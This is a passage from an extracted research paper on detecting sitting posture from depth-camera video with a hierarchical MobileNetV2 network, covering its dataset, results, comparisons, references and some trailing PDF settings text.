Informatics, Kaunas University of Technology (2018-09-24 No. IFEP201809-2). Further expansion of dataset to include different body types or disabilities may additionally improve the results in more real world cases. Data labelling Once the data is collected it must be labeled manually. However, one of the issues when labeling data we have noticed that has caused some of the data points to be thrown out completely is for a person to actually differentiate properly what posture that person is in. Even though the filming took in relatively discrete time intervals, some subjects may take longer/shorter to perform specified actions, they may attempt to fix their posture due to it being uncomfortable for them, etc. Additionally, some people have indiscernible sitting straight and lightly hunched posture, as their normal posture is already biased towards leaning head forward. Therefore, the labeling of such data is a challenge due to its subjectiveness as bad data labels may poison the network and cause it to overfit instead of generalizing. Using our recorded dataset, we have extracted these labels: sitting straight, lightly hunched, hunched over, extremely hunched, partially lying and lying down. While we have three backwards posture angles, we opted for only two backwards posture labels as it is difficult to objectively measure lying down and extremely lying down as in multiple cases subjects barely made any movements. Kulikajevas et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.442 9/20 http://dx.doi.org/10.7717/peerj-cs.442 https://peerj.com/computer-science/ Dataset Our dataset consists of 66 different captured video sequence instances totaling 133 min of recording, which we split into individual labeled frames. We used 10-fold cross- validation. For training, we had split the data from each individual in 90:10 ratio instead of splitting the frames, as this gives more objective results, because similar frames from the same captured video will not be a part of evaluation, thus artificially increasing the recall rate. We can see the number of frames in training and testing frames in Table 2, additionally we can see that dataset is slightly skewed towards sitting straight and lying down due to the dataset being not completely balanced. While class imbalance may cause issues in generalization of the network, we believe that the imbalance is not high enough to have a noticeable impact. Finally, the examples of images in the dataset are given in Table 3 (right side view). The subjects presented in the images have provided their informed consent for publication of identifying images in an online open-access publication. RESULTS Accuracy We evaluate the prediction correctness against ground truth in two stages: using final prediction labels (sitting straight, lightly hunched, hunched over, extremely hunched, partially lying, lying down); and intermediate branch predictions (forward posture, backward posture, straight posture). This provides us better insight on the prediction results as this will show both absolute error and intermediate branch error. The confusion matrix for the first case can be seen in Fig. 4. In the first case, we achieved an accuracy of 68.33%, sensitivity of 0.6794, specificity of 0.9372 and f-score of 0.6789. Note that the network has achieved a high specificity rate, which means that it can effectively recognize the subjects, who do not have the posture problems. As we can see from the confusion matrix (Fig. 4), the biggest issues arise in prediction regarding hunched over and extremely hunched labels. The proposed network model had a hard time discerning between these two values. This indicates that either our dataset for these two labels have little variation and the positions are very similar, or that one of the labels has been mislabeled and has poisoned the predicted values. This suggests that further investigation in our dataset is definitely needed. Table 2 Frame count in the dataset. Posture class Training Testing Dataset (%) Sitting straight 3390 505 21.53 Lightly hunched 2230 200 14.16 Hunched over 2534 321 16.09 Extremely hunched 1918 182 12.18 Partially lying 2053 339 13.04 Lying down 3622 302 23.00 Kulikajevas et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.442 10/20 http://dx.doi.org/10.7717/peerj-cs.442 https://peerj.com/computer-science/ Table 3 Examples of images in dataset (right side view). Posture class RGB and Depth images Sitting straight Lightly hunched forward Hunched over forward Extremely hunched forward Partially lying down in the chair (Continued) Kulikajevas et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.442 11/20 http://dx.doi.org/10.7717/peerj-cs.442 https://peerj.com/computer-science/ However, all largest misclassification values occur between neighbouring classes (extremely hunched vs hunched over—49.5%), (hunched over vs extremely hunched— 40.66%), (partially lying vs lying down—28.15%), (lying down vs partially lying—19.47%), suggesting that perhaps the need for some fuzzification of class definitions and interpretation of results, or that these posture classes should be combined. Our dataset depends on the expert interpretation of what they are seeing in the camera, which may be the cause of this disparity. Performing data labeling by more experts may improve the results as this would reduce the ambiguity in our dataset that we have due to a limited number of experts labeling the data. However, the network is accurate enough that it can suggest the labels in further labeling processing. This would change our solution from being supervised machine learning into semi-supervised or even completely Figure 4 Confusion matrix indicating expected labels versus network predictions. Accuracy values are given in percents. Diagonal values indicate correct predictions. Full-size DOI: 10.7717/peerj-cs.442/fig-4 Table 3 (continued) Posture class RGB and Depth images Lying down in the chair Kulikajevas et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.442 12/20 http://dx.doi.org/10.7717/peerj-cs.442/fig-4 http://dx.doi.org/10.7717/peerj-cs.442 https://peerj.com/computer-science/ unsupervised machine learning approach. Notwithstanding, this is beyond the scope of our research. However, if we investigate further we can see from Fig. 5 that the root posture prediction has better results, where the network model manages to generalize between forward posture, backward posture and straight posture cases. This partial confusion matrix (Fig. 5) makes it clear that while some finer detail in our dataset is less objective and is difficult for the network to generalize, the neural network itself is adept in solving the classification of the base postures with the mean accuracy rate of 91.47% (sensitivity 0.9185, specificity 0.9595, f-score 0.9132 and kappa 0.8081). The bottom level (root) labels are more than enough in a lot of cases when it comes to posture recognition tasks that do not require precise user angle extraction. Additionally, when comparing partial and full confusion matrices we can see that the deeper levels additionally have lower false negative results, indicating the addition of the hierarchical structure for prediction can inherently improve the prediction results in deeper levels due to the semantic connections between labels. Performance Due to fact that our approach uses MobileNetV2 as the backbone for our ANN that means that is lightweight and can be used in real-time applications. Our method performs a posture prediction on average in 94 ms (which corresponds to 10 fps rate) on a workstation with the following specifications: Intel i7-4790 CPU with 16GB of RAM, nVidia 1070 GPU with 8GB of GDDR5 VRAM. Comparison We compare our results with the results of other authors in Table 4. Figure 5 Confusion matrix indicating bottom level expected labels versus network predictions. Accuracy values are given in percents. Diagonal values indicate correct predictions. Full-size DOI: 10.7717/peerj-cs.442/fig-5 Kulikajevas et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.442 13/20 http://dx.doi.org/10.7717/peerj-cs.442/fig-5 http://dx.doi.org/10.7717/peerj-cs.442 https://peerj.com/computer-science/ Our method allows to achieve the real time sitting posture recognition with the same or better recognition accuracy and video resolution than other similar state-of-the-art methods. For example, Wang et al. (2016) achieved higher accuracy and recognition rate, however their method require the visibility of full skeleton detected by Kinect sensors and not occluded by any obstacles. Gochoo et al. (2018, 2019) achieved a very high recognition rate using three low resolution thermal sensors placed around the subject to recognize eight postures and 26 yoga postures, respectively, but no occlusions were allowed either. Tariq et al. (2019) used Kinect and additional motion sensors from smartwatch to achieve the required level of accuracy. DISCUSSION The training of neural network depends on hardware used for recording. We used Intel Realsense D435i, but the results may be worse when using different hardware, for example, KinectV2 as these two devices produce different noise in their depth fields. This may cause the network to have poorer results when compared to the one that it has been trained on. However, we are not able to validate this claim. Additionally, when testing the network using the real-time camera feed we had noticed that while relatively similar and their mirror image angles work it may have lower precision rates with something more extreme like placing sensor very high or very low relative to the table or user. Finally, when using in real world application, one of the measures to improve prediction stability is to use majority voting on the preceding 10 video frames. This is performed by taking the prediction label that had appeared the most times in the previous recorded 10 frames. This technique can improve the stability of the predictions as a single video frame will no longer change the prediction results. However, the predictions will have a delay, due to previous video frames influencing the result for a short period of time. Table 4 Comparison of posture recognition methods. Method Frame resolution, px Frame rate, fps Accuracy, % Task Reference Real-time deformable detector 320 × 240 10 75.33 Hand posture recognition Hernandez-Belmonte & Ayala-Ramirez (2016) Ensemble of InceptionResNetV2 640 × 480 n/a 95.34 Four postures (standing, sitting, lying, and lying crouched) Byeon et al. (2020) LVQ (learning vector quantization) neural network 640 × 480 333 99.01 Five full-skeleton postures (standing, sitting, stooping, kneeling, and lying) Wang et al. (2016) Multi-stage convolutional neural network (M-CNN) n/a 5 98.70 Two postures for fall detection Zhang, Wu & Wang (2020) LVQ neural network 48 × 16 10 99.95 Eight postures (stand, hand raise, akimbo, open wide arms, squat, toe touch, crawl, and lie) Gochoo et al. (2018) Deep CNN 24 × 8 9 99.99 26 yoga postures Gochoo et al. (2019) D CNN n/a n/a 98.16 Detection of 10 standstill body poses. Liu et al. (2020) Deep recurrent hierarchical network 640 × 480 10 91.47 Spine posture recognition while sitting This paper Note: n/a, data is not available. Kulikajevas et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.442 14/20 http://dx.doi.org/10.7717/peerj-cs.442 https://peerj.com/computer-science/ Another limitation of this study is a small number of subjects (11), all healthy, which may have influenced the validity of the results. The age range and gender diversity of the subject group was limited. In future, we will have to extend the subject group to include various professional/occupational groups as well as school children and adolescents as well as people with different body types and disabilities in order to improve the results for real world cases. CONCLUSION We have proposed an extension of the MobileNetV2 neural network, which allows the use of sequential video data as an input, therefore, allowing for the deep neural network to extract important temporal features from video frames, which would otherwise be lost when compared to a single-frame classification while still being capable of the single-frame prediction due to being biased towards the last frame. We have improved the top-layer of the MobileNetV2 architecture by adding the hierarchical data representation, which acts as a semantic lock for top-level label classification by filtering out the invalid class labels early. Additionally, we have performed a pilot study based in which we suggest the methodology required to collect the training dataset and validation datasets. Further improvements in dataset collection methodology can be made in order to account for different body shapes, disabilities and removing labeling ambiguities. The proposed posture classification approach is highly extensible due to its flattened tree representation, which can be easily adapted to the already existing posture classification tasks with the depth of the ontological semantic posture model being one of the driving factors for classification quality. Based on our validation data giving us a classification accuracy of 91.47% in predicting three main sitting posture classes (backward posture, forward posture and straight posture) at a rate of 10 fps. Finally, unlike in related work, our method does not depend on the skeletal predictors, therefore we can perform the sitting human posture prediction when only as low as 30% of the human torso is visible in the frame. For these reasons, we believe that our approach is more robust for real-time human posture classification tasks in the real-world office environment. ACKNOWLEDGEMENTS We thank the honorable research prof. S. Misra (Turkey) for tuning our model for green computing awareness, prof. A. Lawrinson (USA) for his inspiration of semantical frame analysis, and the team of prof. M. Von Gleiwitz and D. Pollack (Argentina) for their suggestions of the Pareto optimization method to improve MobileNet performance. ADDITIONAL INFORMATION AND DECLARATIONS Funding The authors received no funding for this work. Competing Interests Robertas Damaševičius is an Academic Editor for PeerJ. Kulikajevas et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.442 15/20 http://dx.doi.org/10.7717/peerj-cs.442 https://peerj.com/computer-science/ Author Contributions � Audrius Kulikajevas conceived and designed the experiments, performed the experiments, analyzed the data, performed the computation work, authored or reviewed drafts of the paper, and approved the final draft. � Rytis Maskeliunas conceived and designed the experiments, performed the experiments, analyzed the data, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. � Robertas Damaševičius analyzed the data, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. Ethics The following information was supplied relating to ethical approvals (i.e., approving body and any reference numbers): The research was approved by the Institutional Review Board, Faculty of Informatics, Kaunas University of Technology (No. IFEP201809-2). Data Availability The following information was supplied regarding data availability: Data and code are available on GitHub: https://github.com/realratchet/SitStraightNet REFERENCES Abobakr A, Hossny M, Nahavandi S. 2018. A skeleton-free fall detection system from depth images using random decision forest. IEEE Systems Journal 12(3):2994–3005 DOI 10.1109/JSYST.2017.2780260. Afza F, Khan MA, Sharif M, Kadry S, Manogaran G, Saba T, Ashraf I, Damaševičius R. 2021. A framework of human action recognition using length control features fusion and weighted entropy-variances based feature selection. Image and Vision Computing 106:104090. Alam F, Mehmood R, Katib I, Altowaijri SM, Albeshri A. 2019. TAAWUN: a decision fusion and feature specific road detection approach for connected autonomous vehicles. Mobile Networks and Applications 15(5):50 DOI 10.1007/s11036-019-01319-2. Alberdi A, Aztiria A, Basarab A, Cook DJ. 2018. Using smart offices to predict occupational stress. International Journal of Industrial Ergonomics 67(3):13–26 DOI 10.1016/j.ergon.2018.04.005. Arnold D, Li X, Lin Y, Wang Z, Yi W, Saniie J. 2020. Iot framework for 3d body posture visualization. IEEE International Conference on Electro Information Technology 2020:117–120. Bei S, Xing Z, Taocheng L, Qin L. 2017. Sitting posture detection using adaptively fused 3d features. In: 2017 IEEE 2nd Information Technology, Networking, Electronic and Automation Control Conference. Piscataway: IEEE, 1073–1077. Bibbo D, Carli M, Conforto S, Battisti F. 2019. A sitting posture monitoring instrument to assess different levels of cognitive engagement. Sensors (Switzerland) 19(3):455 DOI 10.3390/s19030455. Bouvier B, Duprey S, Claudon L, Dumas R, Savescu A. 2015. Upper limb kinematics using inertial and magnetic sensors: comparison of sensor-to-segment calibrations. Sensors 15(8):18813–18833 DOI 10.3390/s150818813. Kulikajevas et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.442 16/20 https://github.com/realratchet/SitStraightNet http://dx.doi.org/10.1109/JSYST.2017.2780260 http://dx.doi.org/10.1007/s11036-019-01319-2 http://dx.doi.org/10.1016/j.ergon.2018.04.005 http://dx.doi.org/10.3390/s19030455 http://dx.doi.org/10.3390/s150818813 http://dx.doi.org/10.7717/peerj-cs.442 https://peerj.com/computer-science/ Byeon Y-H, Lee J-Y, Kim D-H, Kwak K-C. 2020. Posture recognition using ensemble deep models under various home environments. Applied Sciences 10(4):1287 DOI 10.3390/app10041287. Cagnie B, Danneels L, Tiggelen DV, Loose VD, Cambier D. 2006. Individual and work related risk factors for neck pain among office workers: a cross sectional study. European Spine Journal 16(5):679–686 DOI 10.1007/s00586-006-0269-7. Camalan S, Sengul G, Misra S, Maskeliunas R, Damaševičius R. 2018. Gender detection using 3d anthropometric measurements by kinect. Metrology and Measurement Systems 25(2):253–267. Chen H, Dou Q, Yu L, Qin J, Heng P. 2018a. Voxresnet: Deep voxelwise residual networks for brain segmentation from 3D MR images. NeuroImage 170:446–455 DOI 10.1016/j.neuroimage.2017.04.041. Chen Y, Yu L, Ota K, Dong M. 2018b. Robust activity recognition for aging society. IEEE Journal of Biomedical and Health Informatics 22(6):1754–1764 DOI 10.1109/JBHI.2018.2819182. Chin LCK, Eu KS, Tay TT, Teoh CY, Yap KM. 2019. A posture recognition model dedicated for differentiating between proper and improper sitting posture with kinect sensor. In: HAVE, 2019—IEEE International Symposium on Haptic, Audio-Visual Environments and Games, Proceedings. Dias D, Cunha JPS. 2018. Wearable health devices—vital sign monitoring, systems and technologies. Sensors 18(8):2414 DOI 10.3390/s18082414. Fawzi A, Samulowitz H, Turaga D, Frossard P. 2016. Adaptive data augmentation for image classification. In: 2016 IEEE International Conference on Image Processing (ICIP). Piscataway: IEEE, 3688–3692. García Patiño A, Khoshnam M, Menon C. 2020. Wearable device to monitor back movements using an inductive textile sensor. Sensors 20(3):905. Gochoo M, Tan T-H, Batjargal T, Seredin O, Huang S-C. 2018. Device-free non-privacy invasive indoor human posture recognition using low-resolution infrared sensor-based wireless sensor networks and DCNN. In: 2018 IEEE International Conference on Systems, Man, and Cybernetics. Piscataway: IEEE. Gochoo M, Tan T-H, Huang S-C, Batjargal T, Hsieh J-W, Alnajjar FS, Chen Y-F. 2019. Novel IoT-based privacy-preserving yoga posture recognition system using low-resolution infrared sensors and deep learning. IEEE Internet of Things Journal 6(4):7192–7200 DOI 10.1109/JIOT.2019.2915095. Grandjean E, Hünting W. 1977. Ergonomics of posture—review of various problems of standing and sitting posture. Applied Ergonomics 8(3):135–140 DOI 10.1016/0003-6870(77)90002-3. Graves A, Mohamed A, Hinton G. 2013. Speech recognition with deep recurrent neural networks. In: 2013 IEEE International Conference on Acoustics, Speech and Signal Processing. Piscataway: IEEE, 6645–6649. Hanin B. 2019. Universal function approximation by deep neural nets with bounded width and relu activations. Mathematics 7(10):992 DOI 10.3390/math7100992. Hernandez-Belmonte U, Ayala-Ramirez V. 2016. Real-time hand posture recognition for human-robot interaction tasks. Sensors 16(1):36 DOI 10.3390/s16010036. Hirasawa T, Aoyama K, Tanimoto T, Ishihara S, Shichijo S, Ozawa T, Ohnishi T, Fujishiro M, Matsuo K, Fujisaki J, Tada T. 2018. Application of artificial intelligence using a convolutional neural network for detecting gastric cancer in endoscopic images. Gastric Cancer 21(4):653–660 DOI 10.1007/s10120-018-0793-2. Ho ESL, Chan JCP, Chan DCK, Shum HPH, Cheung Y, Yuen PC. 2016. Improving posture classification accuracy for depth sensor-based human activity monitoring in smart Kulikajevas et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.442 17/20 http://dx.doi.org/10.3390/app10041287 http://dx.doi.org/10.1007/s00586-006-0269-7 http://dx.doi.org/10.1016/j.neuroimage.2017.04.041 http://dx.doi.org/10.1109/JBHI.2018.2819182 http://dx.doi.org/10.3390/s18082414 http://dx.doi.org/10.1109/JIOT.2019.2915095 http://dx.doi.org/10.1016/0003-6870(77)90002-3 http://dx.doi.org/10.3390/math7100992 http://dx.doi.org/10.3390/s16010036 http://dx.doi.org/10.1007/s10120-018-0793-2 http://dx.doi.org/10.7717/peerj-cs.442 https://peerj.com/computer-science/ environments. Computer Vision and Image Understanding 148(3):97–110 DOI 10.1016/j.cviu.2015.12.011. Holden D, Duong BC, Datta S, Nowrouzezahrai D. 2019. Subspace neural physics: fast data-driven interactive simulation. In: SCA '19: Proceedings of the 18th annual ACM SIGGRAPH/Eurographics Symposium on Computer Animation. Hondori HM, Khademi M. 2014. A review on technical and clinical impact of microsoft kinect on physical therapy and rehabilitation. Journal of Medical Engineering 2014:1–16. Howard AG, Zhu M, Chen B, Kalenichenko D, Wang W, Weyand T, Andreetto M, Adam H. 2017. Mobilenets: efficient convolutional neural networks for mobile vision applications. arXiv. Available at http://arxiv.org/abs/1704.04861v1. Huang X, Gao L. 2019. Reconstructing three-dimensional human poses: a combined approach of iterative calculation on skeleton model and conformal geometric algebra. Symmetry 11(3):301 DOI 10.3390/sym11030301. Huang J, Hsu S, Huang C. 2013. Human upper body posture recognition and upper limbs motion parameters estimation. In: 2013 Asia-Pacific Signal and Information Processing Association Annual Summit and Conference. 1–9. Jankovic J, McDermott M, Carter J, Gauthier S, Goetz C, Golbe L, Huber S, Koller W, Olanow C, Shoulson I, Stern M, Tanner C, Weiner W. 1990. Variable expression of parkinson’s disease: a base-line analysis of the datatop cohort. Neurology 40(10):1529–1534 DOI 10.1212/WNL.40.10.1529. Ji B, Hong EJ. 2019. Deep-learning-based real-time road traffic prediction using long-term evolution access data. Sensors 19(23):5327 DOI 10.3390/s19235327. Jiang M, Kong J, Bebis G, Huo H. 2015. Informative joints based human action recognition using skeleton contexts. Signal Processing: Image Communication 33(2):29–40 DOI 10.1016/j.image.2015.02.004. Kamilaris A, Prenafeta-Boldú FX. 2018. Deep learning in agriculture: a survey. Computers and Electronics in Agriculture 147(2):70–90 DOI 10.1016/j.compag.2018.02.016. Keselman L, Woodfill JI, Grunnet-Jepsen A, Bhowmik A. 2017. Intel(r) realSense(TM) stereoscopic depth cameras. In: IEEE Conference on Computer Vision and Pattern Recognition Workshops (CVPRW). Piscataway: IEEE. Kingma DP, Ba J. 2015. Adam: a method for stochastic optimization. CoRR. Available at http://arxiv.org/abs/1412.6980. Li B, Bai B, Han C. 2020. Upper body motion recognition based on key frame and random forest regression. Multimedia Tools and Applications 79(7–8):5197–5212 DOI 10.1007/s11042-018-6357-y. Li Y, Shen L. 2018. Skin lesion analysis towards melanoma detection using deep learning network. Sensors 18(2):556 DOI 10.3390/s18020556. Li Y, Xu H, Bian M, Xiao J. 2020. Attention based CNN-convLSTM for pedestrian attribute recognition. Sensors 20(3):811 DOI 10.3390/s20030811. Liu C, Chen L-C, Schroff F, Adam H, Hua W, Yuille AL, Fei-Fei L. 2019. Auto-deeplab: hierarchical neural architecture search for semantic image segmentation. In: The IEEE Conference on Computer Vision and Pattern Recognition (CVPR). Piscataway: IEEE. Liu J, Wang Y, Liu Y, Xiang S, Pan C. 2020. 3D posturenet: a unified framework for skeleton- based posture recognition. Pattern Recognition Letters 140(8):143–149 DOI 10.1016/j.patrec.2020.09.029. Kulikajevas et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.442 18/20 http://dx.doi.org/10.1016/j.cviu.2015.12.011 http://arxiv.org/abs/1704.04861v1 http://dx.doi.org/10.3390/sym11030301 http://dx.doi.org/10.1212/WNL.40.10.1529 http://dx.doi.org/10.3390/s19235327 http://dx.doi.org/10.1016/j.image.2015.02.004 http://dx.doi.org/10.1016/j.compag.2018.02.016 http://arxiv.org/abs/1412.6980 http://dx.doi.org/10.1007/s11042-018-6357-y http://dx.doi.org/10.3390/s18020556 http://dx.doi.org/10.3390/s20030811 http://dx.doi.org/10.1016/j.patrec.2020.09.029 http://dx.doi.org/10.7717/peerj-cs.442 https://peerj.com/computer-science/ Ma C, Li W, Cao J, Du J, Li Q, Gravina R. 2020. Adaptive sliding window based activity recognition for assisted livings. Information Fusion 53(1):55–65 DOI 10.1016/j.inffus.2019.06.013. Maskeliunas R, Damaševičius R, Segal S. 2019. A review of internet of things technologies for ambient assisted living environments. Future Internet 11(12):259 DOI 10.3390/fi11120259. Matthew RP, Seko S, Bailey J, Bajcsy R, Lotz J. 2019. Estimating sit-to-stand dynamics using a single depth camera. IEEE Journal of Biomedical and Health Informatics 23(6):2592–2602 DOI 10.1109/JBHI.2019.2897245. Murugan P, Durairaj S. 2017. Regularization and optimization strategies in deep convolutional neural network. CoRR. Available at http://arxiv.org/abs/1712.04711. Nweke HF, Teh YW, Mujtaba G, Al-garadi MA. 2019. Data fusion and multiple classifier systems for human activity detection and health monitoring: review and open research directions. Information Fusion 46(Part 1):147–170 DOI 10.1016/j.inffus.2018.06.002. Okewu E, Misra S, Maskeliunas R, Damasevicius R, Fernandez-Sanz L. 2017. Optimizing green computing awareness for environmental sustainability and economic security as a stochastic optimization problem. Sustainability 9(10):1857 DOI 10.3390/su9101857. Perusquía-Hernández M, Enomoto T, Martins T, Otsuki M, Iwata H, Suzuki K. 2017. Embodied interface for levitation and navigation in a 3d large space. In: ACM International Conference Proceeding Series. New York: ACM. Pham HH, Salmane H, Khoudour L, Crouzil A, Zegers P, Velastin SA. 2019. Spatio—temporal image representation of 3D skeletal movements for view-invariant action recognition with deep convolutional neural networks. Sensors 19(8):1932 DOI 10.3390/s19081932. Plonis D, Katkevicius A, Gurskas A, Urbanavicius V, Maskeliunas R, Damasevicius R. 2020. Prediction of meander delay system parameters for internet-of-things devices using pareto- optimal artificial neural network and multiple linear regression. IEEE Access 8:39525–39535 DOI 10.1109/ACCESS.2020.2974184. Redmon J, Farhadi A. 2018. Yolov3: an incremental improvement. CoRR. Available at http://arxiv.org/abs/1804.02767. Ruta M, Scioscia F, di Summa M, Ieva S, Sciascio ED, Sacco M. 2014. Semantic matchmaking for kinect-based posture and gesture recognition. In: 2014 IEEE International Conference on Semantic Computing. Piscataway: IEEE. Ryselis K, Petkus T, Blažauskas T, Maskeliūnas R, Damaševičius R. 2020. Multiple kinect based system to monitor and analyze key performance indicators of physical training. Human-Centric Computing and Information Sciences 10(1):51. Saab SS, Msheik H. 2016. Novel RFID-based pose estimation using single stationary antenna. IEEE Transactions on Industrial Electronics 63(3):1842–1852 DOI 10.1109/TIE.2015.2496909. Sandler M, Howard A, Zhu M, Zhmoginov A, Chen L. 2018. Mobilenetv2: inverted residuals and linear bottlenecks. In: 2018 IEEE/CVF Conference on Computer Vision and Pattern Recognition. Piscataway: IEEE, 4510–4520. Sengupta A, Jin F, Zhang R, Cao S. 2020. Mm-pose: Real-time human skeletal posture estimation using mmwave radars and cnns. IEEE Sensors Journal 20(17):10032–10044 DOI 10.1109/JSEN.2020.2991741. Sharma M, Majumdar PK. 2009. Occupational lifestyle diseases: an emerging issue. Indian Journal of Occupational and Environmental Medicine 13(3):109–112 DOI 10.4103/0019-5278.58912. Sundermeyer M, Ney H, Schluter R. 2015. From feedforward to recurrent LSTM neural networks for language modeling. IEEE/ACM Transactions on Audio, Speech, and Language Processing 23(3):517–529 DOI 10.1109/TASLP.2015.2400218. Kulikajevas et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.442 19/20 http://dx.doi.org/10.1016/j.inffus.2019.06.013 http://dx.doi.org/10.3390/fi11120259 http://dx.doi.org/10.1109/JBHI.2019.2897245 http://arxiv.org/abs/1712.04711 http://dx.doi.org/10.1016/j.inffus.2018.06.002 http://dx.doi.org/10.3390/su9101857 http://dx.doi.org/10.3390/s19081932 http://dx.doi.org/10.1109/ACCESS.2020.2974184 http://arxiv.org/abs/1804.02767 http://dx.doi.org/10.1109/TIE.2015.2496909 http://dx.doi.org/10.1109/JSEN.2020.2991741 http://dx.doi.org/10.4103/0019-5278.58912 http://dx.doi.org/10.1109/TASLP.2015.2400218 http://dx.doi.org/10.7717/peerj-cs.442 https://peerj.com/computer-science/ Tariq M, Majeed H, Beg MO, Khan FA, Derhab A. 2019. Accurate detection of sitting posture activities in a secure IoT based assisted living environment. Future Generation Computer Systems 92(4):745–757 DOI 10.1016/j.future.2018.02.013. Wang W-J, Chang J-W, Haung S-F, Wang R-J. 2016. Human posture recognition based on images captured by the kinect sensor. International Journal of Advanced Robotic Systems 13(2):54 DOI 10.5772/62163. Wang J, Zhang J, Cai Y, Deng L. 2019. DeepMiR2GO: inferring functions of human microRNAs using a deep multi-label classification model. International Journal of Molecular Sciences 20(23):6046 DOI 10.3390/ijms20236046. Wen L, Li X, Gao L, Zhang Y. 2018. A new convolutional neural network-based data-driven fault diagnosis method. IEEE Transactions on Industrial Electronics 65(7):5990–5998 DOI 10.1109/TIE.2017.2774777. Wu G, Shao X, Guo Z, Chen Q, Yuan W, Shi X, Xu Y, Shibasaki R. 2018. Automatic building segmentation of aerial imagery using multi-constraint fully convolutional networks. Remote Sensing 10(3):407 DOI 10.3390/rs10030407. Xu S, Guo J, Zhang G, Bie R. 2020. Automated detection of multiple lesions on chest x-ray images: classification using a neural network technique with association-specific contexts. Applied Sciences 10(5):1742 DOI 10.3390/app10051742. Zemp R, Tanadini M, Plüss S, Schnüriger K, Singh NB, Taylor WR, Lorenzetti S. 2016. Application of machine learning approaches for classifying sitting posture based on force and acceleration sensors. BioMed Research International 2016(1):1–9 DOI 10.1155/2016/5978489. Zhang Z. 2012. Microsoft kinect sensor and its effect. IEEE Multimedia 19(2):4–10 DOI 10.1109/MMUL.2012.24. Zhang J, Wu C, Wang Y. 2020. Human fall detection based on body posture spatio-temporal evolution. Sensors 20(3):946 DOI 10.3390/s20030946. Zhang T, Zhang X, Shi J, Wei S. 2019. Depthwise separable convolution neural network for high-speed sar ship detection. Remote Sensing 11(21):2483 DOI 10.3390/rs11212483. Zhou B, Khosla A, Lapedriza A, Oliva A, Torralba A. 2016. Learning deep features for discriminative localization. In: 2016 IEEE Conference on Computer Vision and Pattern Recognition. Piscataway: IEEE, 2921–2929. Zhou J, Tian Y, Yuan C, Yin K, Yang G, Wen M. 2019. Improved uav opium poppy detection using an updated yolov3 model. Sensors 19(22):4851 DOI 10.3390/s19224851. Kulikajevas et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.442 20/20 http://dx.doi.org/10.1016/j.future.2018.02.013 http://dx.doi.org/10.5772/62163 http://dx.doi.org/10.3390/ijms20236046 http://dx.doi.org/10.1109/TIE.2017.2774777 http://dx.doi.org/10.3390/rs10030407 http://dx.doi.org/10.3390/app10051742 http://dx.doi.org/10.1155/2016/5978489 http://dx.doi.org/10.1109/MMUL.2012.24 http://dx.doi.org/10.3390/s20030946 http://dx.doi.org/10.3390/rs11212483 http://dx.doi.org/10.3390/s19224851 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.442 Detection of sitting posture using hierarchical image composition and deep learning Introduction Related work Methods Results Discussion Conclusion flink7 References << /ASCII85EncodePages false /AllowTransparency false /AutoPositionEPSFiles true /AutoRotatePages /None /Binding /Left /CalGrayProfile (Dot Gain 20%) /CalRGBProfile (sRGB IEC61966-2.1) /CalCMYKProfile (U.S. Web Coated \050SWOP\051 v2) /sRGBProfile (sRGB IEC61966-2.1) /CannotEmbedFontPolicy /Warning /CompatibilityLevel 1.4 /CompressObjects /Off /CompressPages true /ConvertImagesToIndexed true /PassThroughJPEGImages true /CreateJobTicket false /DefaultRenderingIntent /Default /DetectBlends true /DetectCurves 0.0000 /ColorConversionStrategy /LeaveColorUnchanged /DoThumbnails false /EmbedAllFonts true /EmbedOpenType false /ParseICCProfilesInComments true /EmbedJobOptions true /DSCReportingLevel 0 /EmitDSCWarnings false /EndPage -1 /ImageMemory 1048576 /LockDistillerParams false /MaxSubsetPct 100 /Optimize true /OPM 1 /ParseDSCComments true /ParseDSCCommentsForDocInfo true /PreserveCopyPage true /PreserveDICMYKValues true /PreserveEPSInfo true /PreserveFlatness true /PreserveHalftoneInfo false /PreserveOPIComments false /PreserveOverprintSettings true /StartPage 1 /SubsetFonts true /TransferFunctionInfo /Apply /UCRandBGInfo /Preserve /UsePrologue false /ColorSettingsFile (None) /AlwaysEmbed [ true ] /NeverEmbed [ true ] /AntiAliasColorImages false /CropColorImages true /ColorImageMinResolution 300 /ColorImageMinResolutionPolicy /OK /DownsampleColorImages false /ColorImageDownsampleType /Average /ColorImageResolution 300 /ColorImageDepth 8 /ColorImageMinDownsampleDepth 1 /ColorImageDownsampleThreshold 1.50000 /EncodeColorImages true /ColorImageFilter /FlateEncode /AutoFilterColorImages false /ColorImageAutoFilterStrategy /JPEG /ColorACSImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /ColorImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /JPEG2000ColorACSImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /JPEG2000ColorImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /AntiAliasGrayImages false /CropGrayImages true /GrayImageMinResolution 300 /GrayImageMinResolutionPolicy /OK /DownsampleGrayImages false /GrayImageDownsampleType /Average /GrayImageResolution 300 /GrayImageDepth 8 /GrayImageMinDownsampleDepth 2 /GrayImageDownsampleThreshold 1.50000 /EncodeGrayImages true /GrayImageFilter /FlateEncode /AutoFilterGrayImages false /GrayImageAutoFilterStrategy /JPEG /GrayACSImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /GrayImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /JPEG2000GrayACSImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /JPEG2000GrayImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /AntiAliasMonoImages false /CropMonoImages true /MonoImageMinResolution 1200 